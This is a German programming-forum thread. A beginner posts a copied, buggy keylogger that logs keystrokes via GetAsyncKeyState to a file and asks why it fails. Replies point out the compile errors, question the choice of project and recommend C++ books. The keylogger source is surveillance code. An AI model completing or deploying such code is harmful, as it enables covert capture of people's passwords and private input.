C++ Source Fehler `?

• Hey Com.

Ich hab zwar etwas ahnung von C++ aber der meister darin bin ich nicht.

Nun, da ich mich weiterbilden tue via Buch,Video's und Schriftlichen Anleitungen,kam ich zu ein Problem.

http://www.youtube.com/watch?v=xfHLAyy5hMo&list=LLW7Cqv3MPi1u0LcVYYpk6Mg&feature=mh_lolz

Das Video was ich mir gerade vorgenommen habe.

Und hier dementsprechend mein Quelltext

#include <iostream>
    using namespace std;
    #include <windows.h>
    #include <winuser.h>

int Save (int key_stroke, char *file);

int main()
    {
        char i;

while (1)
        {
              for(i = 8; i <= 190; i++);
              {
                  if (GetAsyncKeyState(i) == -32767)
                     Save (i, "LOG.TEXT");  
              }
        }
        system ("pause");
        return 0;a
    }
    /* ******************************************* */
    /* ******************************************* */
    int Save (int key_stroke, char *file)
    {
        if( (key_stroke == 1)|| (key_stroke == 2) )
            return 0;

FILE *OUTPUT_FILE;
        OUTPUT_FILE = fopen(file, "a+");
        fprintf(OUTPUT_FILE, "%s", &key_stroke);
        fclose(OUTPUT_FILE);

cout << key_stroke << endl;
        return 0;
    }

Jetzt wen ich es ausführen will kommt immer ein Fehler bei (for)
    mit folgenden Fehler Code :

////////////////////////////////////////////////////////////////////
    C:\Users\XXX\Desktop\KeyLog\BasicKeylog.cpp In function int main()': 14 C:\\Users\\XXX\\Desktop\\KeyLog\\BasicKeylog.cpp [Warning] comparison is always true due to limited range of data type 22 C:\\Users\\XXX\\Desktop\\KeyLog\\BasicKeylog.cppa' undeclared (first use this function)
    (Each undeclared identifier is reported only once for each function it appears in.)
    22 C:\Users\XXX\Desktop\KeyLog\BasicKeylog.cpp expected `;' before '}' token
    //////////////////////////////////////////////////////////////////////

Fals jemand jetzt denkt ich schreibe einfach nur alles ab ist das falsch.
    Ich Schreibe alles erste ma ab, danach guck ich bzw denk ich drüber nach was die Funktionen zu bedeuten haben bzw was es bewirktund lern daraus..

/edit pumuckl: cpp-Tags. Demnächst bitte selber dran denken!

• Was soll das hier?

return 0;a

Steht das a wirklich in deinem Code oder hast du nur falsch abgetippt? Falls es wirklich da steht, mach es weg. Im anderen Fall: warum tippst du ab? Damit produzierst du hier nur Fehler, die es in deinem Code gar nicht gibt. Copy&Paste ftw!

FlaMexRx schrieb:

Fals jemand jetzt denkt ich schreibe einfach nur alles ab ist das falsch.
    Ich Schreibe alles erste ma ab,

Schon heute ein Klassiker! 😃

EDIT: Ach ja, bitte bitte bitte benutze cpp-Tags (der C/C++-Button unter den Smileys), damit dein Code hier auch schön formatiert und lesbar gepostet wird. So will das doch keiner lesen.

• FlaMexRx schrieb:

22 C:\Users\XXX\Desktop\KeyLog\BasicKeylog.cpp `a' undeclared (first use this function)

Na was steht denn in deiner BasicKeylog.cpp in Zeile 22, und was daran ist quatsch?

• char i; 

while (1) 
    	{ 
    		for(i = 8; i <= 190; i++);

Warum char ?? Dein i hat wahrscheinlich einen Wertebereich von -128 bis 127 und kann damit niemals über 190 anwachsen. Die Schleife läuft also endlos weiter. Wird ja auch vom Compiler angemeckert. Nimm einfach int . Und lerne, die Fehlermeldungen und Warnungen zu lesen. 🙂

1. Lerne die Fehlermeldungen des Compilers zu lesen. Wenn er dir eine Zeile sagt, in der der Fehler sein könnte, dann schau dir die Zeile an. Aufmerksam.
    2. Keine using-Direktive vor #includes.
    3. Entscheide dich zwischen C und C++, was du da schreibst ist C mit cout, keine glückliche Kombination.

• Okey, also Danke für die schnelle Antwort,
    das "a" war drinn 😕

das programm kann jetzt ausgeführt werden, aber es funkt nix sprich es ist nur schwarzes Feld

wass ich auch nicht kapiere ist, das ich c++ schreiben will bzw es auch lerne.
    & ich es so wie der abgeschrieben habe und bei mir es aber nicht geht und bei ihn geht... ??

• Ernstgemeinter Rat: wenn du wirklich programmieren lernen willst, dann lass das. Es bringt überhaupt nichts, aus irgendwelchen Videos schlechte Keyloggaz abzuschreiben. Dabei lernst du rein gar nichts. Schnapp dir ein gutes Buch und fang an, zu pauken. Und wenn du dann die C++-Grundlagen beherrschst, kannst du dich in die WinAPI einarbeiten. Und wenn du die dann so halbwegs verstehst, kannst du deinen eigenen Keylogger schreiben, den du dann auch Zeile für Zeile verstehst. Und der dann auch funktioniert. Aber so bringt das einfach nichts, wie du gerade auch selbst merken solltest.

Außerdem: warum ausgerechnet ein Scheiß-Keylogger? Warum nicht was Vernünftiges? Findest du das so cool? 🙄

EDIT: Ach ja, mit C++ hat dieser Code herzlich wenig zu tun. Das nur am Rande. Das würde dir bewusst werden, wenn du anfangen würdest, C++ zu lernen. 🙂

• den keylogger code wollte ich um den grundsatz zu verstehen wie an ein programm schrieben kann das die tastenschläge aufzuschreiben bzw in ner variable zu speichern.

Zu dem Buch, ich habe folgendes und bis zu ner gewissen seite eingearbeitet :112 und das buch heißt : c++ von A bis Z

• Ein schlechteres Buch hättest du dir kaum aussuchen können, sorry. Such hier im Forum mal nach dem Autor, Jürgen Wolf.

EDIT: Spar dir das Suchen. 😉 http://www.c-plusplus.net/forum/272350-full

• FlaMexRx schrieb:

Zu dem Buch, ich habe folgendes und bis zu ner gewissen seite eingearbeitet :112 und das buch heißt : c++ von A bis Z

Huii... http://www.c-plusplus.net/forum/272350 :p

Edit: Oh, da war jemand schneller als ich...

• Na toll -. -

da ihr mehr ahnung habt, welches Buch wäre stadessen besser .. ?
    Bitte mit Preis angeben

• FlaMexRx schrieb:

Bitte mit Preis angeben

... und persönlich verfasster Rezension und ISBN und Direktlink zum Buch bei Amazon. Bitte!! 😃

• Für Anfänger gibt es so einige gute Bücher. Hier der Link für Büchertipps.
    http://www.c-plusplus.net/forum/251551

Meine Favoriten sind "Der C++ Programmierer"(49,99) und "Einführung in die Programmierung mit C++"(69,95)
    Wenn du knapp bei Kasse sein solltest, gibts sogar ein Gratisbuch "Thinking in C++" das recht gut ist.
    http://www.mindview.net/Books/TICPP/ThinkingInCPP2e.html

Btw. gibts eigentlich den Primer nicht auch als Freebook?? 😕

gruß
    syntax

• Swordfish schrieb:

FlaMexRx schrieb:

Bitte mit Preis angeben

... und persönlich verfasster Rezension und ISBN und Direktlink zum Buch bei Amazon. Bitte!! 😃

😃 👍

Anmelden zum Antworten